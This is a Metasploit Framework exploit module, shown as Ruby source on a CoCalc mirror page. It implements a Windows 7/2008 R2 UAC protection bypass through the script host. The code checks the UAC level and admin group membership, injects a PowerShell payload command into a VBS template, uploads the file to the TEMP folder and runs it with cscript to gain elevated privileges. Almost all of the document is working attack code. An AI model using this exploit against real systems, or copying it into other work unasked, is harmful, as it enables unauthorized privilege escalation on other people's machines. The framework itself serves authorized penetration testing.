CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/local/bypassuac_vbs.rb
Views: 11655
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Local

7
  Rank = ExcellentRanking

8


9
  include Exploit::FileDropper

10
  include Exploit::Powershell

11
  include Post::File

12
  include Post::Windows::Priv

13
  include Post::Windows::Runas

14


15
  def initialize(info = {})

16
    super(

17
      update_info(

18
        info,

19
        'Name' => 'Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)',

20
        'Description' => %q{

21
          This module will bypass Windows UAC by utilizing the missing .manifest on the script host

22
          cscript/wscript.exe binaries.

23
        },

24
        'License' => MSF_LICENSE,

25
        'Author' => [

26
          'Vozzie',

27
          'Ben Campbell'

28
        ],

29
        'Platform' => [ 'win' ],

30
        'SessionTypes' => [ 'meterpreter' ],

31
        'Targets' => [

32
          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]

33
        ],

34
        'DefaultTarget' => 0,

35
        'References' => [

36
          ['URL', 'http://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html'],

37
          ['URL', 'https://github.com/Vozzie/uacscript']

38
        ],

39
        'DisclosureDate' => '2015-08-22'

40
      )

41
    )

42
  end

43


44
  def exploit

45
    # Validate that we can actually do things before we bother

46
    # doing any more work

47
    validate_environment!

48
    check_permissions!

49


50
    # get all required environment variables in one shot instead. This

51
    # is a better approach because we don't constantly make calls through

52
    # the session to get the variables.

53
    env_vars = get_envs('TEMP', 'WINDIR')

54


55
    case get_uac_level

56
    when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,

57
        UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,

58
        UAC_PROMPT_CREDS, UAC_PROMPT_CONSENT

59
      fail_with(Failure::NotVulnerable,

60
                "UAC is set to 'Always Notify'. This module does not bypass this setting, exiting...")

61
    when UAC_DEFAULT

62
      print_good('UAC is set to Default')

63
      print_good('BypassUAC can bypass this setting, continuing...')

64
    when UAC_NO_PROMPT

65
      print_warning('UAC set to DoNotPrompt - using ShellExecute "runas" method instead')

66
      shell_execute_exe

67
      return

68
    end

69


70
    vbs_filepath = "#{env_vars['TEMP']}\\#{rand_text_alpha(8)}.vbs"

71


72
    upload_vbs(vbs_filepath)

73


74
    cmd_exec("cscript.exe //B #{vbs_filepath}")

75
  end

76


77
  def check_permissions!

78
    # Check if you are an admin

79
    vprint_status('Checking admin status...')

80
    admin_group = is_in_admin_group?

81


82
    if admin_group.nil?

83
      print_error('Either whoami is not there or failed to execute')

84
      print_error('Continuing under assumption you already checked...')

85
    elsif admin_group

86
      print_good('Part of Administrators group! Continuing...')

87
    else

88
      fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')

89
    end

90


91
    if get_integrity_level == INTEGRITY_LEVEL_SID[:low]

92
      fail_with(Failure::NoAccess, 'Cannot BypassUAC from Low Integrity Level')

93
    end

94
  end

95


96
  def upload_vbs(payload_filepath)

97
    vbs = File.read(File.join(Msf::Config.data_directory,

98
                              'exploits',

99
                              'scripthost_uac_bypass',

100
                              'bypass.vbs'))

101


102
    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true)

103


104
    vbs.gsub!('COMMAND', command)

105
    print_status('Uploading the Payload VBS to the filesystem...')

106
    begin

107
      vprint_status("Payload VBS #{vbs.length} bytes long being uploaded..")

108
      write_file(payload_filepath, vbs)

109
      register_file_for_cleanup(payload_filepath)

110
    rescue Rex::Post::Meterpreter::RequestError => e

111
      fail_with(Failure::Unknown, "Error uploading file #{payload_filepath}: #{e.class} #{e}")

112
    end

113
  end

114


115
  def validate_environment!

116
    fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?

117


118
    version = get_version_info

119
    if version.win7_or_2008r2?

120
      print_good("#{version.product_name} may be vulnerable.")

121
    else

122
      fail_with(Failure::NotVulnerable, "#{version.product_name} is not vulnerable.")

123
    end

124


125
    if is_uac_enabled?

126
      print_status('UAC is Enabled, checking level...')

127
    else

128
      unless is_in_admin_group?

129
        fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')

130
      end

131
    end

132
  end

133
end

134


135